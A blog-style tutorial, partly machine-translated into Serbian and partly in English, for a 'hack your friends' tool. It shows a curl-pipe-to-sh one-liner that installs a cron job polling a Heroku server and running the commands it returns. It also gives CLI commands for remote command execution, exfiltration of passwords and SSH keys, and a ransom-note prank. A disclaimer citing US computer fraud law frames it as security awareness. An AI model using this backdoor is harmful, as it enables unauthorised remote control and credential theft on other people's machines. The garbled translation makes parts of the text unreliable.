Како хаковати своје пријатеље

Моји пријатељи често остављају рачунаре отворене и откључане. Кажем им да би вероватно требало да имају навику закључавања рачунара, али ме не слушају. Направио сам једноставан пројекат за хаковање мојих пријатеља и показивање важности рачунарске сигурности.

Све што треба да урадим је да сачекам да оставе рачунар неколико секунди откључан, да отворе терминал и укуцају једну кратку команду.

То је то! Њихов рачунар је сада заражен и на овом рачунару могу даљински да покрећем било које наредбе. Прилично слатко, зар не? Или можда шокантно?

Хакирање је незаконито. Конкретно:

„Намерни приступ рачунару без овлашћења или прекорачење овлашћеног приступа“ - Закон о рачунарским преварама и злоупотребама (18 УСЦ 1030)

Дакле, имајте на уму да је сврха овог чланка да вам покаже колико лако би било да вас неко са лошим намерама хакује како бисте избегли да вас сами хакују.

Не треба вам неки хакерски геније да вам уништи живот - било који „киддик из скрипте“ који може добити физички приступ рачунару може вас компромитовати преузимањем скрипте која садржи само 50 редова кода.

Добивање подешавања

Сав код за овај пројекат живи у овом спремишту ако желите да ускочите одмах, али у наставку ћу објаснити како то све функционише.

Прво треба само да клонирате репо, инсталирате његове зависности и да повежете алат за сучеље хацк цомманд лине (ЦЛИ).

git clone //github.com/ccorcos/hack.gitgit remote remove origincd hacknpm installnpm link

Даље, треба да подесите Хероку да хостује скрипте које ће се изводити на вашем рачунару пријатеља. Ако никада раније нисте користили Хероку, пријавите се овде (бесплатно је!) И подесите њихов ЦЛИ алат на својој машини.

brew install heroku-toolbeltheroku login

Сада унутар хацк репо-а направите Хероку апликацију са лаким именом које ћете памтити. Користим хацкер-цхет.

heroku create hacker-chet

Затим требате покренути команду да бисте извршили мало подешавања. Све што заправо ради је добијање роот УРЛ адресе за вашу Хероку веб локацију и стављање у ваш пацкаге.јсон . На овај начин сервер може убризгати УРЛ апликације у скрипте љуске.

npm run init

Можете да покренете сервер локално ако желите да се хакујете и тестирате ствари.

npm start

Или се можете распоредити на Хероку.

npm run deploy

Сада сте спремни за хаковање!

Хацк АПИ

Љепота овог програма је у томе што је за покретање некога потребно само покренути једну команду на њиховој машини.

curl /hack | sh

РООТ_УРЛ је одређени пут до ваше апликације. Када локално покрећете сервер, ово ће бити лоцалхост: 5000, а када се примените на Хероку, биће нешто попут .херокуа пп.цом.

Ово што ради је постављање црон посла - „хронолошког посла“ који понавља задатке у одређено време - да сваког минута пингује / енв / ливе крајњу тачку и резултате усмери у сх . Заправо је прилично једноставно! А Хероку вам даје ХТТПС бесплатно, па је тако „сигуран“, зар не?

Након што хакујете свог пријатеља, све остало можете да урадите помоћу алата за командну линију са рачунара.

Хацк алат има концепт различитих хакерисаним окружења. Када некога хакујете помоћу / хацк крајње тачке, та особа започиње у живом окружењу. И за свако окружење можете покренути низ различитих команди. Све ћу демонстрирати са малим кораком.

Следеће ће преписати скрипту љуске окружења уживо како би се извршила следећа команда која ће наглас рећи „Гледам те“.

hack live exec "say 'I\'m watching you'"

Па, то још увек неће функционисати, и даље морате поново да се примените у своју апликацију Хероку.

hack deploy

Сада сачекајте следећи минут и гледајте рачунар свог пријатеља како пингује ваш сервер пратећи дневнике сервера.

hack logs

Читава поента окружења је у томе да можете истовремено хаковати више људи. Да бисте изоловали људе у различитим окружењима, потребно је само да промените име.

hack live rename jon

Следећи пут када се живо окружење пингује, оно ће преписати задатак црон да би уместо тога започело пинговање јон окружења.

Све исто можете учинити само променом аргумента околине.

hack jon exec "say 'hello jon'"

Сад, ако сте се довољно забавили за тај дан и забава је готова, можете заборавити Јона и уверити га да сте га „разочарали“.

hack jon forget

Ово ће избрисати црон посао са њиховог рачунара. Или бисте можда можда само желели да ово окружење пребаците у режим спавања, да бисте га касније могли опоравити.

hack jon interval 1d

Now, rather than pinging your server every minute (the default), it will ping every day at midnight. And when you want to wake it back up, you can change the interval back to every minute and the next day, you’re good to go!

hack jon interval 1m

Some other fun things to do are setting up additional cron jobs. Here’s how you can wake your friend up at 6am every morning to remind him about computer security.

hack jon cron "0 6 * * * say 'good morning jon, remember what I told you about locking your computer?'"

P.S. If you don’t remember how cron jobs work, this is a great resource. It pretty much all comes down to this little diagram.

* * * * *| | | | || | | | || | | | +---- Day of the Week (range: 1-7, 1 standing for Monday)| | | +------ Month of the Year (range: 1-12)| | +-------- Day of the Month (range: 1-31)| +---------- Hour (range: 0-23)+------------ Minute (range: 0-59)

One of my favorites is the desktop preset which will download an image from a given URL and set it as the background photo.

hack jon preset desktop //i.imgur.com/5FC2r9R.jpg

And if you’ve written a ton of cron jobs and you don’t know what’s on there anymore, you can use the dump command.

hack jon dump "crontab -l"

Сада бичем отворите своје дневнике и видећете излаз на следећем пингу. Ово је заправо много злокобније сада када можете добити информације назад. Ако сте желели да будете подлији, можете да потражите дешифроване лозинке или да им украдете ссх кључеве.

hack jon preset passwordshack jon preset ssh

Али ако само желите да га уплашите старомодно, пошаљите му поруку о откупнини!

hack jon preset ransom "Hello Jon, I told you not to leave your computer unlocked."

И на крају, ако вам се дода гомила црон послова и желите само да започнете испочетка, ресетовање је ту да вам помогне.

hack jon reset

Сада се забавите (одговорно) са овом ствари и обавестите ме које су ваше омиљене подвале подношењем захтева за повлачење са новом командом или унапред подешеном поставком!

Хаппи Хацкинг!